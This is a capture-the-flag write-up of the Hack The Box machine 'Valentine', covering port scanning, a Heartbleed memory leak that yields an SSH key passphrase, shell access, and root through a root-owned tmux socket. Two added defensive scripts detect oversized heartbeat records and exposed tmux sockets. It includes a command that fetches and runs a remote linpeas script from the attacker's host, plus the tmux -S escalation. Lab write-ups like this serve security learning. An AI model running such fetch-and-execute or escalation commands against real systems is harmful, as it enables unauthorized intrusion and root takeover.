Write-Up: HTB Valentine

Mertle
5 min read · Nov 23, 2020

Valentine is an easy Linux box on Hack the Box. Let’s jump right in!

First off, run my Mercon script (combines nmap and smbmap/gobuster depending on what the nmap scan finds).

Looking at the output, it looks like we have a basic web server with an SSH port open.

kali@kali:~/development/Mercon$ ./mercon.py -t Valentine -i 10.10.10.79 -w /usr/share/wordlists/dirb/common.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:35 EST
Nmap scan report for 10.10.10.79
Host is up (0.025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2020-11-14T22:37:04+00:00; +1m18s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 1m17s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.92 seconds

[+] Gobuster Running
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.79/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/11/14 17:35:47 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/decode (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/11/14 17:36:10 Finished
===============================================================

Time to check out the homepage before enumerating the directories we found with Gobuster. Nothing too interesting here, but it’s worth noting that the heart logo matches the Heartbleed vulnerability logo. Made a note of that and then began jumping into the various directories.

Checking out /dev, there are a few files available. First, let’s look at notes.txt to see if there’s any helpful info that’s been left behind.

The more interesting file is “hype_key” that is full of hex. Time to decode it and see what the developers left us.

Well, this is very nice of them to leave behind. It’s an SSH private key! Unfortunately, it’s password encrypted and attempting to brute force it didn’t work… Well, time to keep enumerating. Let’s jump back over to nmap and see if this server is actually vulnerable to the Heartbleed attack.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

-----END RSA PRIVATE KEY-----

Lucky for us, it looks like the service is vulnerable :)

kali@kali:~/htb/valentine$ nmap -p 443 --script ssl-heartbleed 10.10.10.79
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 18:00 EST
Nmap scan report for 10.10.10.79
Host is up (0.024s latency).

PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://www.openssl.org/news/secadv_20140407.txt
|_ http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
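
What the ssl-heartbleed script is really testing for is a missing length check, so here is that check written out as a small detector (an added example, not part of the original write-up and not the Exploit-DB script). It assumes you have the plaintext TLS record in hand; the function names and sample records are constructed for illustration.

```python
import struct

TLS_HEARTBEAT = 0x18   # TLS record content type 24 (RFC 6520)
MIN_PADDING = 16       # RFC 6520 requires at least 16 bytes of padding

def check_heartbeat(record):
    """Classify one plaintext TLS record as 'not-heartbeat', 'truncated',
    'ok' or 'overread' (declared payload does not fit in the record)."""
    if len(record) < 5:
        return "truncated"
    ctype, _version, rec_len = struct.unpack("!BHH", record[:5])
    if ctype != TLS_HEARTBEAT:
        return "not-heartbeat"
    body = record[5:5 + rec_len]
    if rec_len < 3 or len(body) < rec_len:
        return "truncated"
    _hb_type, payload_len = struct.unpack("!BH", body[:3])
    # The check vulnerable OpenSSL skipped: type (1) + length (2) +
    # payload + padding must fit inside the bytes actually received.
    if 1 + 2 + payload_len + MIN_PADDING > rec_len:
        return "overread"
    return "ok"

def sample_record(declared_len, payload, padding):
    """Build a constructed heartbeat record for the demo below."""
    body = struct.pack("!BH", 1, declared_len) + payload + bytes(padding)
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0302, len(body)) + body

# Constructed inputs, not captured traffic
SAMPLES = {
    "honest": sample_record(4, b"ping", 16),      # length field matches payload
    "lying": sample_record(64, b"hi", 0),         # claims 64 bytes, carries 2
    "handshake": b"\x16\x03\x02\x00\x00",         # some other record type
}

def classify_samples():
    """Run the check over every constructed sample."""
    return {name: check_heartbeat(rec) for name, rec in SAMPLES.items()}

if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:10} {verdict}")
```

Patched OpenSSL silently drops any heartbeat that lands in the "overread" branch, which is what RFC 6520 asks for.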

Now it’s time to exploit. Copy the script from Exploit-DB and give it a go (I filtered out lines with empty bytes to reduce noise). The results show a $text variable that looks like it is base64 encoded.

I edited the script with the following to run the exploit 5 times, just to see if we get anything else from the server. Unfortunately, we didn’t find anything else.

if __name__ == '__main__':
    # Call the script's existing main() five times in a row
    for x in range(5):
        main()

Decoding the text variable gets us the following string.

kali@kali:~/htb/valentine$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
heartbleedbelievethehype

Let’s try this as the SSH key password and see where it gets us. And… it definitely gets us somewhere, a shell on the box!

kali@kali:~/htb/valentine$ ssh -i hype_key hype@10.10.10.79
load pubkey "hype_key": invalid format
Enter passphrase for key 'hype_key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

* Documentation: https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$

Send over linpeas to see if we can find anything blatantly wrong that will allow us to escalate our privileges.

hype@Valentine:~/Desktop$ bash <(curl -s http://10.10.14.22:8000/linPEAS/linpeas.sh)

Linpeas highlights a tmux process running as root. Looking it up on Google, it looks like this is trivial to exploit to get root.

================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
102 550 0.0 0.1 24076 1252 ? Ss 14:35 0:00 dbus-daemon --system --fork --activation=upstart
avahi 617 0.0 0.0 32172 468 ? S 14:35 0:00 avahi-daemon: chroot helper
daemon 1038 0.0 0.0 16900 376 ? Ss 14:36 0:00 atd
hype 2602 0.0 0.1 92220 1672 ? S 15:13 0:00 sshd: hype@pts/0
hype 2603 0.0 0.8 31648 8768 pts/0 Ss 15:13 0:00 -bash
hype 2804 0.1 0.1 4776 1112 pts/0 S+ 15:19 0:00 /bin/sh ./linpeas.sh
hype 3355 0.0 0.1 22352 1276 pts/0 R+ 15:19 0:00 ps aux
hype 3357 0.0 0.0 19864 808 pts/0 S+ 15:19 0:00 sort
root 1 0.0 0.2 24428 2420 ? Ss 14:35 0:00 /sbin/init
root 1006 0.0 0.0 19976 976 tty2 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty2
root 1007 0.0 0.0 19976 976 tty3 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty3
root 1010 0.0 0.1 26416 1672 ? Ss 14:36 0:00 /usr/bin/tmux -S /.devs/dev_sess

Run tmux with the /.devs/dev_sess path for -S (socket-path) and we have root!

hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess


root@Valentine:/home/hype/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
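
For the blue-team side of this finding, here is a small audit script (an added example, not part of the original write-up or of linpeas) that pulls root-owned tmux -S sockets out of ps aux output and reports who besides the owner can connect to them. The function names are made up for illustration, and the sample rows are copied from the linpeas listing above.

```python
import os
import re
import stat

# Socket path handed to tmux with -S, as it appears in a ps command column
TMUX_SOCKET = re.compile(r"\btmux\b.*?\s-S\s*(\S+)")

# Three rows copied from the linpeas process listing above
SAMPLE_PS = """\
hype 2603 0.0 0.8 31648 8768 pts/0 Ss 15:13 0:00 -bash
root 1 0.0 0.2 24428 2420 ? Ss 14:35 0:00 /sbin/init
root 1010 0.0 0.1 26416 1672 ? Ss 14:36 0:00 /usr/bin/tmux -S /.devs/dev_sess
"""

def root_tmux_sockets(ps_output):
    """Return the -S socket paths of tmux servers that ps shows as root."""
    paths = []
    for line in ps_output.splitlines():
        fields = line.split(None, 10)  # ps aux: 10 columns, then the command
        if len(fields) == 11 and fields[0] == "root":
            match = TMUX_SOCKET.search(fields[10])
            if match:
                paths.append(match.group(1))
    return paths

def exposure(mode, gid):
    """Who besides the owner can connect to a socket with this st_mode.
    On Linux, connecting to a Unix socket needs write permission on it."""
    if not stat.S_ISSOCK(mode):
        return []
    found = []
    if mode & stat.S_IWGRP:
        found.append("group %d" % gid)
    if mode & stat.S_IWOTH:
        found.append("other")
    return found

def audit(ps_output):
    """Map each root tmux socket to its exposure (None if it cannot be read)."""
    report = {}
    for path in root_tmux_sockets(ps_output):
        try:
            st = os.stat(path)
            report[path] = exposure(st.st_mode, st.st_gid)
        except OSError:
            report[path] = None
    return report

if __name__ == "__main__":
    print(audit(SAMPLE_PS))
```

An empty list for a socket means only its owner can attach; anything else is worth fixing by keeping the socket mode 0600 inside a root-only directory.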

Overall, this was a fun box to go through. Thanks for reading!
